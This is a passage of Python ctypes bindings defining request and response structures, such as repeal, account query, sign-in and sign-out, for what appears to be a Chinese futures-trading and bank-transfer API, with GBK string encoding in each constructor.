("Message", c_char_Array_129),
("Digest", c_char_Array_36),
("BankAccType", c_char),
("DeviceID", c_char_Array_3),
("BankSecuAccType", c_char),
("BrokerIDByBank", c_char_Array_33),
("BankSecuAcc", c_char_Array_41),
("BankPwdFlag", c_char),
("SecuPwdFlag", c_char),
("OperNo", c_char_Array_17),
("RequestID", c_int),
("TID", c_int),
("TransferStatus", c_char),
("ErrorID", c_int),
("ErrorMsg", c_char_Array_81),
("LongCustomerName", c_char_Array_161),
]
def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, CustomerName=None, IdCardType=None, IdentifiedCardNo=None, CustType=None, BankAccount=None, BankPassWord=None, AccountID=None, Password=None, InstallID=None, FutureSerial=None, UserID=None, VerifyCertNoFlag=None, CurrencyID=None, TradeAmount=None, FutureFetchAmount=None, FeePayFlag=None, CustFee=None, BrokerFee=None, Message=None, Digest=None, BankAccType=None, DeviceID=None, BankSecuAccType=None, BrokerIDByBank=None, BankSecuAcc=None, BankPwdFlag=None, SecuPwdFlag=None, OperNo=None, RequestID=None, TID=None, TransferStatus=None, ErrorID=None, ErrorMsg=None, LongCustomerName=None):
super().__init__()
if TradeCode:
self.TradeCode = TradeCode.encode("GBK")
if BankID:
self.BankID = BankID.encode("GBK")
if BankBranchID:
self.BankBranchID = BankBranchID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if BrokerBranchID:
self.BrokerBranchID = BrokerBranchID.encode("GBK")
if TradeDate:
self.TradeDate = TradeDate.encode("GBK")
if TradeTime:
self.TradeTime = TradeTime.encode("GBK")
if BankSerial:
self.BankSerial = BankSerial.encode("GBK")
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if PlateSerial:
self.PlateSerial = PlateSerial
if LastFragment:
self.LastFragment = LastFragment.encode("GBK")
if SessionID:
self.SessionID = SessionID
if CustomerName:
self.CustomerName = CustomerName.encode("GBK")
if IdCardType:
self.IdCardType = IdCardType.encode("GBK")
if IdentifiedCardNo:
self.IdentifiedCardNo = IdentifiedCardNo.encode("GBK")
if CustType:
self.CustType = CustType.encode("GBK")
if BankAccount:
self.BankAccount = BankAccount.encode("GBK")
if BankPassWord:
self.BankPassWord = BankPassWord.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if Password:
self.Password = Password.encode("GBK")
if InstallID:
self.InstallID = InstallID
if FutureSerial:
self.FutureSerial = FutureSerial
if UserID:
self.UserID = UserID.encode("GBK")
if VerifyCertNoFlag:
self.VerifyCertNoFlag = VerifyCertNoFlag.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if TradeAmount:
self.TradeAmount = TradeAmount
if FutureFetchAmount:
self.FutureFetchAmount = FutureFetchAmount
if FeePayFlag:
self.FeePayFlag = FeePayFlag.encode("GBK")
if CustFee:
self.CustFee = CustFee
if BrokerFee:
self.BrokerFee = BrokerFee
if Message:
self.Message = Message.encode("GBK")
if Digest:
self.Digest = Digest.encode("GBK")
if BankAccType:
self.BankAccType = BankAccType.encode("GBK")
if DeviceID:
self.DeviceID = DeviceID.encode("GBK")
if BankSecuAccType:
self.BankSecuAccType = BankSecuAccType.encode("GBK")
if BrokerIDByBank:
self.BrokerIDByBank = BrokerIDByBank.encode("GBK")
if BankSecuAcc:
self.BankSecuAcc = BankSecuAcc.encode("GBK")
if BankPwdFlag:
self.BankPwdFlag = BankPwdFlag.encode("GBK")
if SecuPwdFlag:
self.SecuPwdFlag = SecuPwdFlag.encode("GBK")
if OperNo:
self.OperNo = OperNo.encode("GBK")
if RequestID:
self.RequestID = RequestID
if TID:
self.TID = TID
if TransferStatus:
self.TransferStatus = TransferStatus.encode("GBK")
if ErrorID:
self.ErrorID = ErrorID
if ErrorMsg:
self.ErrorMsg = ErrorMsg.encode("GBK")
if LongCustomerName:
self.LongCustomerName = LongCustomerName.encode("GBK")
class ReqRepeal(Struct):
_fields_ = [
("RepealTimeInterval", c_int),
("RepealedTimes", c_int),
("BankRepealFlag", c_char),
("BrokerRepealFlag", c_char),
("PlateRepealSerial", c_int),
("BankRepealSerial", c_char_Array_13),
("FutureRepealSerial", c_int),
("TradeCode", c_char_Array_7),
("BankID", c_char_Array_4),
("BankBranchID", c_char_Array_5),
("BrokerID", c_char_Array_11),
("BrokerBranchID", c_char_Array_31),
("TradeDate", c_char_Array_9),
("TradeTime", c_char_Array_9),
("BankSerial", c_char_Array_13),
("TradingDay", c_char_Array_9),
("PlateSerial", c_int),
("LastFragment", c_char),
("SessionID", c_int),
("CustomerName", c_char_Array_51),
("IdCardType", c_char),
("IdentifiedCardNo", c_char_Array_51),
("CustType", c_char),
("BankAccount", c_char_Array_41),
("BankPassWord", c_char_Array_41),
("AccountID", c_char_Array_13),
("Password", c_char_Array_41),
("InstallID", c_int),
("FutureSerial", c_int),
("UserID", c_char_Array_16),
("VerifyCertNoFlag", c_char),
("CurrencyID", c_char_Array_4),
("TradeAmount", c_double),
("FutureFetchAmount", c_double),
("FeePayFlag", c_char),
("CustFee", c_double),
("BrokerFee", c_double),
("Message", c_char_Array_129),
("Digest", c_char_Array_36),
("BankAccType", c_char),
("DeviceID", c_char_Array_3),
("BankSecuAccType", c_char),
("BrokerIDByBank", c_char_Array_33),
("BankSecuAcc", c_char_Array_41),
("BankPwdFlag", c_char),
("SecuPwdFlag", c_char),
("OperNo", c_char_Array_17),
("RequestID", c_int),
("TID", c_int),
("TransferStatus", c_char),
("LongCustomerName", c_char_Array_161),
]
def __init__(self, RepealTimeInterval=None, RepealedTimes=None, BankRepealFlag=None, BrokerRepealFlag=None, PlateRepealSerial=None, BankRepealSerial=None, FutureRepealSerial=None, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, CustomerName=None, IdCardType=None, IdentifiedCardNo=None, CustType=None, BankAccount=None, BankPassWord=None, AccountID=None, Password=None, InstallID=None, FutureSerial=None, UserID=None, VerifyCertNoFlag=None, CurrencyID=None, TradeAmount=None, FutureFetchAmount=None, FeePayFlag=None, CustFee=None, BrokerFee=None, Message=None, Digest=None, BankAccType=None, DeviceID=None, BankSecuAccType=None, BrokerIDByBank=None, BankSecuAcc=None, BankPwdFlag=None, SecuPwdFlag=None, OperNo=None, RequestID=None, TID=None, TransferStatus=None, LongCustomerName=None):
super().__init__()
if RepealTimeInterval:
self.RepealTimeInterval = RepealTimeInterval
if RepealedTimes:
self.RepealedTimes = RepealedTimes
if BankRepealFlag:
self.BankRepealFlag = BankRepealFlag.encode("GBK")
if BrokerRepealFlag:
self.BrokerRepealFlag = BrokerRepealFlag.encode("GBK")
if PlateRepealSerial:
self.PlateRepealSerial = PlateRepealSerial
if BankRepealSerial:
self.BankRepealSerial = BankRepealSerial.encode("GBK")
if FutureRepealSerial:
self.FutureRepealSerial = FutureRepealSerial
if TradeCode:
self.TradeCode = TradeCode.encode("GBK")
if BankID:
self.BankID = BankID.encode("GBK")
if BankBranchID:
self.BankBranchID = BankBranchID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if BrokerBranchID:
self.BrokerBranchID = BrokerBranchID.encode("GBK")
if TradeDate:
self.TradeDate = TradeDate.encode("GBK")
if TradeTime:
self.TradeTime = TradeTime.encode("GBK")
if BankSerial:
self.BankSerial = BankSerial.encode("GBK")
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if PlateSerial:
self.PlateSerial = PlateSerial
if LastFragment:
self.LastFragment = LastFragment.encode("GBK")
if SessionID:
self.SessionID = SessionID
if CustomerName:
self.CustomerName = CustomerName.encode("GBK")
if IdCardType:
self.IdCardType = IdCardType.encode("GBK")
if IdentifiedCardNo:
self.IdentifiedCardNo = IdentifiedCardNo.encode("GBK")
if CustType:
self.CustType = CustType.encode("GBK")
if BankAccount:
self.BankAccount = BankAccount.encode("GBK")
if BankPassWord:
self.BankPassWord = BankPassWord.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if Password:
self.Password = Password.encode("GBK")
if InstallID:
self.InstallID = InstallID
if FutureSerial:
self.FutureSerial = FutureSerial
if UserID:
self.UserID = UserID.encode("GBK")
if VerifyCertNoFlag:
self.VerifyCertNoFlag = VerifyCertNoFlag.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if TradeAmount:
self.TradeAmount = TradeAmount
if FutureFetchAmount:
self.FutureFetchAmount = FutureFetchAmount
if FeePayFlag:
self.FeePayFlag = FeePayFlag.encode("GBK")
if CustFee:
self.CustFee = CustFee
if BrokerFee:
self.BrokerFee = BrokerFee
if Message:
self.Message = Message.encode("GBK")
if Digest:
self.Digest = Digest.encode("GBK")
if BankAccType:
self.BankAccType = BankAccType.encode("GBK")
if DeviceID:
self.DeviceID = DeviceID.encode("GBK")
if BankSecuAccType:
self.BankSecuAccType = BankSecuAccType.encode("GBK")
if BrokerIDByBank:
self.BrokerIDByBank = BrokerIDByBank.encode("GBK")
if BankSecuAcc:
self.BankSecuAcc = BankSecuAcc.encode("GBK")
if BankPwdFlag:
self.BankPwdFlag = BankPwdFlag.encode("GBK")
if SecuPwdFlag:
self.SecuPwdFlag = SecuPwdFlag.encode("GBK")
if OperNo:
self.OperNo = OperNo.encode("GBK")
if RequestID:
self.RequestID = RequestID
if TID:
self.TID = TID
if TransferStatus:
self.TransferStatus = TransferStatus.encode("GBK")
if LongCustomerName:
self.LongCustomerName = LongCustomerName.encode("GBK")
class RspRepeal(Struct):
_fields_ = [
("RepealTimeInterval", c_int),
("RepealedTimes", c_int),
("BankRepealFlag", c_char),
("BrokerRepealFlag", c_char),
("PlateRepealSerial", c_int),
("BankRepealSerial", c_char_Array_13),
("FutureRepealSerial", c_int),
("TradeCode", c_char_Array_7),
("BankID", c_char_Array_4),
("BankBranchID", c_char_Array_5),
("BrokerID", c_char_Array_11),
("BrokerBranchID", c_char_Array_31),
("TradeDate", c_char_Array_9),
("TradeTime", c_char_Array_9),
("BankSerial", c_char_Array_13),
("TradingDay", c_char_Array_9),
("PlateSerial", c_int),
("LastFragment", c_char),
("SessionID", c_int),
("CustomerName", c_char_Array_51),
("IdCardType", c_char),
("IdentifiedCardNo", c_char_Array_51),
("CustType", c_char),
("BankAccount", c_char_Array_41),
("BankPassWord", c_char_Array_41),
("AccountID", c_char_Array_13),
("Password", c_char_Array_41),
("InstallID", c_int),
("FutureSerial", c_int),
("UserID", c_char_Array_16),
("VerifyCertNoFlag", c_char),
("CurrencyID", c_char_Array_4),
("TradeAmount", c_double),
("FutureFetchAmount", c_double),
("FeePayFlag", c_char),
("CustFee", c_double),
("BrokerFee", c_double),
("Message", c_char_Array_129),
("Digest", c_char_Array_36),
("BankAccType", c_char),
("DeviceID", c_char_Array_3),
("BankSecuAccType", c_char),
("BrokerIDByBank", c_char_Array_33),
("BankSecuAcc", c_char_Array_41),
("BankPwdFlag", c_char),
("SecuPwdFlag", c_char),
("OperNo", c_char_Array_17),
("RequestID", c_int),
("TID", c_int),
("TransferStatus", c_char),
("ErrorID", c_int),
("ErrorMsg", c_char_Array_81),
("LongCustomerName", c_char_Array_161),
]
def __init__(self, RepealTimeInterval=None, RepealedTimes=None, BankRepealFlag=None, BrokerRepealFlag=None, PlateRepealSerial=None, BankRepealSerial=None, FutureRepealSerial=None, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, CustomerName=None, IdCardType=None, IdentifiedCardNo=None, CustType=None, BankAccount=None, BankPassWord=None, AccountID=None, Password=None, InstallID=None, FutureSerial=None, UserID=None, VerifyCertNoFlag=None, CurrencyID=None, TradeAmount=None, FutureFetchAmount=None, FeePayFlag=None, CustFee=None, BrokerFee=None, Message=None, Digest=None, BankAccType=None, DeviceID=None, BankSecuAccType=None, BrokerIDByBank=None, BankSecuAcc=None, BankPwdFlag=None, SecuPwdFlag=None, OperNo=None, RequestID=None, TID=None, TransferStatus=None, ErrorID=None, ErrorMsg=None, LongCustomerName=None):
super().__init__()
if RepealTimeInterval:
self.RepealTimeInterval = RepealTimeInterval
if RepealedTimes:
self.RepealedTimes = RepealedTimes
if BankRepealFlag:
self.BankRepealFlag = BankRepealFlag.encode("GBK")
if BrokerRepealFlag:
self.BrokerRepealFlag = BrokerRepealFlag.encode("GBK")
if PlateRepealSerial:
self.PlateRepealSerial = PlateRepealSerial
if BankRepealSerial:
self.BankRepealSerial = BankRepealSerial.encode("GBK")
if FutureRepealSerial:
self.FutureRepealSerial = FutureRepealSerial
if TradeCode:
self.TradeCode = TradeCode.encode("GBK")
if BankID:
self.BankID = BankID.encode("GBK")
if BankBranchID:
self.BankBranchID = BankBranchID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if BrokerBranchID:
self.BrokerBranchID = BrokerBranchID.encode("GBK")
if TradeDate:
self.TradeDate = TradeDate.encode("GBK")
if TradeTime:
self.TradeTime = TradeTime.encode("GBK")
if BankSerial:
self.BankSerial = BankSerial.encode("GBK")
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if PlateSerial:
self.PlateSerial = PlateSerial
if LastFragment:
self.LastFragment = LastFragment.encode("GBK")
if SessionID:
self.SessionID = SessionID
if CustomerName:
self.CustomerName = CustomerName.encode("GBK")
if IdCardType:
self.IdCardType = IdCardType.encode("GBK")
if IdentifiedCardNo:
self.IdentifiedCardNo = IdentifiedCardNo.encode("GBK")
if CustType:
self.CustType = CustType.encode("GBK")
if BankAccount:
self.BankAccount = BankAccount.encode("GBK")
if BankPassWord:
self.BankPassWord = BankPassWord.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if Password:
self.Password = Password.encode("GBK")
if InstallID:
self.InstallID = InstallID
if FutureSerial:
self.FutureSerial = FutureSerial
if UserID:
self.UserID = UserID.encode("GBK")
if VerifyCertNoFlag:
self.VerifyCertNoFlag = VerifyCertNoFlag.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if TradeAmount:
self.TradeAmount = TradeAmount
if FutureFetchAmount:
self.FutureFetchAmount = FutureFetchAmount
if FeePayFlag:
self.FeePayFlag = FeePayFlag.encode("GBK")
if CustFee:
self.CustFee = CustFee
if BrokerFee:
self.BrokerFee = BrokerFee
if Message:
self.Message = Message.encode("GBK")
if Digest:
self.Digest = Digest.encode("GBK")
if BankAccType:
self.BankAccType = BankAccType.encode("GBK")
if DeviceID:
self.DeviceID = DeviceID.encode("GBK")
if BankSecuAccType:
self.BankSecuAccType = BankSecuAccType.encode("GBK")
if BrokerIDByBank:
self.BrokerIDByBank = BrokerIDByBank.encode("GBK")
if BankSecuAcc:
self.BankSecuAcc = BankSecuAcc.encode("GBK")
if BankPwdFlag:
self.BankPwdFlag = BankPwdFlag.encode("GBK")
if SecuPwdFlag:
self.SecuPwdFlag = SecuPwdFlag.encode("GBK")
if OperNo:
self.OperNo = OperNo.encode("GBK")
if RequestID:
self.RequestID = RequestID
if TID:
self.TID = TID
if TransferStatus:
self.TransferStatus = TransferStatus.encode("GBK")
if ErrorID:
self.ErrorID = ErrorID
if ErrorMsg:
self.ErrorMsg = ErrorMsg.encode("GBK")
if LongCustomerName:
self.LongCustomerName = LongCustomerName.encode("GBK")
class ReqQueryAccount(Struct):
_fields_ = [
("TradeCode", c_char_Array_7),
("BankID", c_char_Array_4),
("BankBranchID", c_char_Array_5),
("BrokerID", c_char_Array_11),
("BrokerBranchID", c_char_Array_31),
("TradeDate", c_char_Array_9),
("TradeTime", c_char_Array_9),
("BankSerial", c_char_Array_13),
("TradingDay", c_char_Array_9),
("PlateSerial", c_int),
("LastFragment", c_char),
("SessionID", c_int),
("CustomerName", c_char_Array_51),
("IdCardType", c_char),
("IdentifiedCardNo", c_char_Array_51),
("CustType", c_char),
("BankAccount", c_char_Array_41),
("BankPassWord", c_char_Array_41),
("AccountID", c_char_Array_13),
("Password", c_char_Array_41),
("FutureSerial", c_int),
("InstallID", c_int),
("UserID", c_char_Array_16),
("VerifyCertNoFlag", c_char),
("CurrencyID", c_char_Array_4),
("Digest", c_char_Array_36),
("BankAccType", c_char),
("DeviceID", c_char_Array_3),
("BankSecuAccType", c_char),
("BrokerIDByBank", c_char_Array_33),
("BankSecuAcc", c_char_Array_41),
("BankPwdFlag", c_char),
("SecuPwdFlag", c_char),
("OperNo", c_char_Array_17),
("RequestID", c_int),
("TID", c_int),
("LongCustomerName", c_char_Array_161),
]
def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, CustomerName=None, IdCardType=None, IdentifiedCardNo=None, CustType=None, BankAccount=None, BankPassWord=None, AccountID=None, Password=None, FutureSerial=None, InstallID=None, UserID=None, VerifyCertNoFlag=None, CurrencyID=None, Digest=None, BankAccType=None, DeviceID=None, BankSecuAccType=None, BrokerIDByBank=None, BankSecuAcc=None, BankPwdFlag=None, SecuPwdFlag=None, OperNo=None, RequestID=None, TID=None, LongCustomerName=None):
super().__init__()
if TradeCode:
self.TradeCode = TradeCode.encode("GBK")
if BankID:
self.BankID = BankID.encode("GBK")
if BankBranchID:
self.BankBranchID = BankBranchID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if BrokerBranchID:
self.BrokerBranchID = BrokerBranchID.encode("GBK")
if TradeDate:
self.TradeDate = TradeDate.encode("GBK")
if TradeTime:
self.TradeTime = TradeTime.encode("GBK")
if BankSerial:
self.BankSerial = BankSerial.encode("GBK")
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if PlateSerial:
self.PlateSerial = PlateSerial
if LastFragment:
self.LastFragment = LastFragment.encode("GBK")
if SessionID:
self.SessionID = SessionID
if CustomerName:
self.CustomerName = CustomerName.encode("GBK")
if IdCardType:
self.IdCardType = IdCardType.encode("GBK")
if IdentifiedCardNo:
self.IdentifiedCardNo = IdentifiedCardNo.encode("GBK")
if CustType:
self.CustType = CustType.encode("GBK")
if BankAccount:
self.BankAccount = BankAccount.encode("GBK")
if BankPassWord:
self.BankPassWord = BankPassWord.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if Password:
self.Password = Password.encode("GBK")
if FutureSerial:
self.FutureSerial = FutureSerial
if InstallID:
self.InstallID = InstallID
if UserID:
self.UserID = UserID.encode("GBK")
if VerifyCertNoFlag:
self.VerifyCertNoFlag = VerifyCertNoFlag.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if Digest:
self.Digest = Digest.encode("GBK")
if BankAccType:
self.BankAccType = BankAccType.encode("GBK")
if DeviceID:
self.DeviceID = DeviceID.encode("GBK")
if BankSecuAccType:
self.BankSecuAccType = BankSecuAccType.encode("GBK")
if BrokerIDByBank:
self.BrokerIDByBank = BrokerIDByBank.encode("GBK")
if BankSecuAcc:
self.BankSecuAcc = BankSecuAcc.encode("GBK")
if BankPwdFlag:
self.BankPwdFlag = BankPwdFlag.encode("GBK")
if SecuPwdFlag:
self.SecuPwdFlag = SecuPwdFlag.encode("GBK")
if OperNo:
self.OperNo = OperNo.encode("GBK")
if RequestID:
self.RequestID = RequestID
if TID:
self.TID = TID
if LongCustomerName:
self.LongCustomerName = LongCustomerName.encode("GBK")
class RspQueryAccount(Struct):
_fields_ = [
("TradeCode", c_char_Array_7),
("BankID", c_char_Array_4),
("BankBranchID", c_char_Array_5),
("BrokerID", c_char_Array_11),
("BrokerBranchID", c_char_Array_31),
("TradeDate", c_char_Array_9),
("TradeTime", c_char_Array_9),
("BankSerial", c_char_Array_13),
("TradingDay", c_char_Array_9),
("PlateSerial", c_int),
("LastFragment", c_char),
("SessionID", c_int),
("CustomerName", c_char_Array_51),
("IdCardType", c_char),
("IdentifiedCardNo", c_char_Array_51),
("CustType", c_char),
("BankAccount", c_char_Array_41),
("BankPassWord", c_char_Array_41),
("AccountID", c_char_Array_13),
("Password", c_char_Array_41),
("FutureSerial", c_int),
("InstallID", c_int),
("UserID", c_char_Array_16),
("VerifyCertNoFlag", c_char),
("CurrencyID", c_char_Array_4),
("Digest", c_char_Array_36),
("BankAccType", c_char),
("DeviceID", c_char_Array_3),
("BankSecuAccType", c_char),
("BrokerIDByBank", c_char_Array_33),
("BankSecuAcc", c_char_Array_41),
("BankPwdFlag", c_char),
("SecuPwdFlag", c_char),
("OperNo", c_char_Array_17),
("RequestID", c_int),
("TID", c_int),
("BankUseAmount", c_double),
("BankFetchAmount", c_double),
("LongCustomerName", c_char_Array_161),
]
def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, CustomerName=None, IdCardType=None, IdentifiedCardNo=None, CustType=None, BankAccount=None, BankPassWord=None, AccountID=None, Password=None, FutureSerial=None, InstallID=None, UserID=None, VerifyCertNoFlag=None, CurrencyID=None, Digest=None, BankAccType=None, DeviceID=None, BankSecuAccType=None, BrokerIDByBank=None, BankSecuAcc=None, BankPwdFlag=None, SecuPwdFlag=None, OperNo=None, RequestID=None, TID=None, BankUseAmount=None, BankFetchAmount=None, LongCustomerName=None):
super().__init__()
if TradeCode:
self.TradeCode = TradeCode.encode("GBK")
if BankID:
self.BankID = BankID.encode("GBK")
if BankBranchID:
self.BankBranchID = BankBranchID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if BrokerBranchID:
self.BrokerBranchID = BrokerBranchID.encode("GBK")
if TradeDate:
self.TradeDate = TradeDate.encode("GBK")
if TradeTime:
self.TradeTime = TradeTime.encode("GBK")
if BankSerial:
self.BankSerial = BankSerial.encode("GBK")
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if PlateSerial:
self.PlateSerial = PlateSerial
if LastFragment:
self.LastFragment = LastFragment.encode("GBK")
if SessionID:
self.SessionID = SessionID
if CustomerName:
self.CustomerName = CustomerName.encode("GBK")
if IdCardType:
self.IdCardType = IdCardType.encode("GBK")
if IdentifiedCardNo:
self.IdentifiedCardNo = IdentifiedCardNo.encode("GBK")
if CustType:
self.CustType = CustType.encode("GBK")
if BankAccount:
self.BankAccount = BankAccount.encode("GBK")
if BankPassWord:
self.BankPassWord = BankPassWord.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if Password:
self.Password = Password.encode("GBK")
if FutureSerial:
self.FutureSerial = FutureSerial
if InstallID:
self.InstallID = InstallID
if UserID:
self.UserID = UserID.encode("GBK")
if VerifyCertNoFlag:
self.VerifyCertNoFlag = VerifyCertNoFlag.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if Digest:
self.Digest = Digest.encode("GBK")
if BankAccType:
self.BankAccType = BankAccType.encode("GBK")
if DeviceID:
self.DeviceID = DeviceID.encode("GBK")
if BankSecuAccType:
self.BankSecuAccType = BankSecuAccType.encode("GBK")
if BrokerIDByBank:
self.BrokerIDByBank = BrokerIDByBank.encode("GBK")
if BankSecuAcc:
self.BankSecuAcc = BankSecuAcc.encode("GBK")
if BankPwdFlag:
self.BankPwdFlag = BankPwdFlag.encode("GBK")
if SecuPwdFlag:
self.SecuPwdFlag = SecuPwdFlag.encode("GBK")
if OperNo:
self.OperNo = OperNo.encode("GBK")
if RequestID:
self.RequestID = RequestID
if TID:
self.TID = TID
if BankUseAmount:
self.BankUseAmount = BankUseAmount
if BankFetchAmount:
self.BankFetchAmount = BankFetchAmount
if LongCustomerName:
self.LongCustomerName = LongCustomerName.encode("GBK")
class FutureSignIO(Struct):
_fields_ = [
("TradeCode", c_char_Array_7),
("BankID", c_char_Array_4),
("BankBranchID", c_char_Array_5),
("BrokerID", c_char_Array_11),
("BrokerBranchID", c_char_Array_31),
("TradeDate", c_char_Array_9),
("TradeTime", c_char_Array_9),
("BankSerial", c_char_Array_13),
("TradingDay", c_char_Array_9),
("PlateSerial", c_int),
("LastFragment", c_char),
("SessionID", c_int),
("InstallID", c_int),
("UserID", c_char_Array_16),
("Digest", c_char_Array_36),
("CurrencyID", c_char_Array_4),
("DeviceID", c_char_Array_3),
("BrokerIDByBank", c_char_Array_33),
("OperNo", c_char_Array_17),
("RequestID", c_int),
("TID", c_int),
]
def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, InstallID=None, UserID=None, Digest=None, CurrencyID=None, DeviceID=None, BrokerIDByBank=None, OperNo=None, RequestID=None, TID=None):
super().__init__()
if TradeCode:
self.TradeCode = TradeCode.encode("GBK")
if BankID:
self.BankID = BankID.encode("GBK")
if BankBranchID:
self.BankBranchID = BankBranchID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if BrokerBranchID:
self.BrokerBranchID = BrokerBranchID.encode("GBK")
if TradeDate:
self.TradeDate = TradeDate.encode("GBK")
if TradeTime:
self.TradeTime = TradeTime.encode("GBK")
if BankSerial:
self.BankSerial = BankSerial.encode("GBK")
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if PlateSerial:
self.PlateSerial = PlateSerial
if LastFragment:
self.LastFragment = LastFragment.encode("GBK")
if SessionID:
self.SessionID = SessionID
if InstallID:
self.InstallID = InstallID
if UserID:
self.UserID = UserID.encode("GBK")
if Digest:
self.Digest = Digest.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if DeviceID:
self.DeviceID = DeviceID.encode("GBK")
if BrokerIDByBank:
self.BrokerIDByBank = BrokerIDByBank.encode("GBK")
if OperNo:
self.OperNo = OperNo.encode("GBK")
if RequestID:
self.RequestID = RequestID
if TID:
self.TID = TID
class RspFutureSignIn(Struct):
_fields_ = [
("TradeCode", c_char_Array_7),
("BankID", c_char_Array_4),
("BankBranchID", c_char_Array_5),
("BrokerID", c_char_Array_11),
("BrokerBranchID", c_char_Array_31),
("TradeDate", c_char_Array_9),
("TradeTime", c_char_Array_9),
("BankSerial", c_char_Array_13),
("TradingDay", c_char_Array_9),
("PlateSerial", c_int),
("LastFragment", c_char),
("SessionID", c_int),
("InstallID", c_int),
("UserID", c_char_Array_16),
("Digest", c_char_Array_36),
("CurrencyID", c_char_Array_4),
("DeviceID", c_char_Array_3),
("BrokerIDByBank", c_char_Array_33),
("OperNo", c_char_Array_17),
("RequestID", c_int),
("TID", c_int),
("ErrorID", c_int),
("ErrorMsg", c_char_Array_81),
("PinKey", c_char_Array_129),
("MacKey", c_char_Array_129),
]
def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, InstallID=None, UserID=None, Digest=None, CurrencyID=None, DeviceID=None, BrokerIDByBank=None, OperNo=None, RequestID=None, TID=None, ErrorID=None, ErrorMsg=None, PinKey=None, MacKey=None):
super().__init__()
if TradeCode:
self.TradeCode = TradeCode.encode("GBK")
if BankID:
self.BankID = BankID.encode("GBK")
if BankBranchID:
self.BankBranchID = BankBranchID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if BrokerBranchID:
self.BrokerBranchID = BrokerBranchID.encode("GBK")
if TradeDate:
self.TradeDate = TradeDate.encode("GBK")
if TradeTime:
self.TradeTime = TradeTime.encode("GBK")
if BankSerial:
self.BankSerial = BankSerial.encode("GBK")
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if PlateSerial:
self.PlateSerial = PlateSerial
if LastFragment:
self.LastFragment = LastFragment.encode("GBK")
if SessionID:
self.SessionID = SessionID
if InstallID:
self.InstallID = InstallID
if UserID:
self.UserID = UserID.encode("GBK")
if Digest:
self.Digest = Digest.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if DeviceID:
self.DeviceID = DeviceID.encode("GBK")
if BrokerIDByBank:
self.BrokerIDByBank = BrokerIDByBank.encode("GBK")
if OperNo:
self.OperNo = OperNo.encode("GBK")
if RequestID:
self.RequestID = RequestID
if TID:
self.TID = TID
if ErrorID:
self.ErrorID = ErrorID
if ErrorMsg:
self.ErrorMsg = ErrorMsg.encode("GBK")
if PinKey:
self.PinKey = PinKey.encode("GBK")
if MacKey:
self.MacKey = MacKey.encode("GBK")
class ReqFutureSignOut(Struct):
_fields_ = [
("TradeCode", c_char_Array_7),
("BankID", c_char_Array_4),
("BankBranchID", c_char_Array_5),
("BrokerID", c_char_Array_11),
("BrokerBranchID", c_char_Array_31),
("TradeDate", c_char_Array_9),
("TradeTime", c_char_Array_9),
("BankSerial", c_char_Array_13),
("TradingDay", c_char_Array_9),
("PlateSerial", c_int),
("LastFragment", c_char),
("SessionID", c_int),
("InstallID", c_int),
("UserID", c_char_Array_16),
("Digest", c_char_Array_36),
("CurrencyID", c_char_Array_4),
("DeviceID", c_char_Array_3),
("BrokerIDByBank", c_char_Array_33),
("OperNo", c_char_Array_17),
("RequestID", c_int),
("TID", c_int),
]
def __init__(self, TradeCode=None, BankID=None, BankBranchID=None, BrokerID=None, BrokerBranchID=None, TradeDate=None, TradeTime=None, BankSerial=None, TradingDay=None, PlateSerial=None, LastFragment=None, SessionID=None, InstallID=None, UserID=None, Digest=None, CurrencyID=None, DeviceID=None, BrokerIDByBank=None, OperNo=None, RequestID=None, TID=None):
super().__init__()
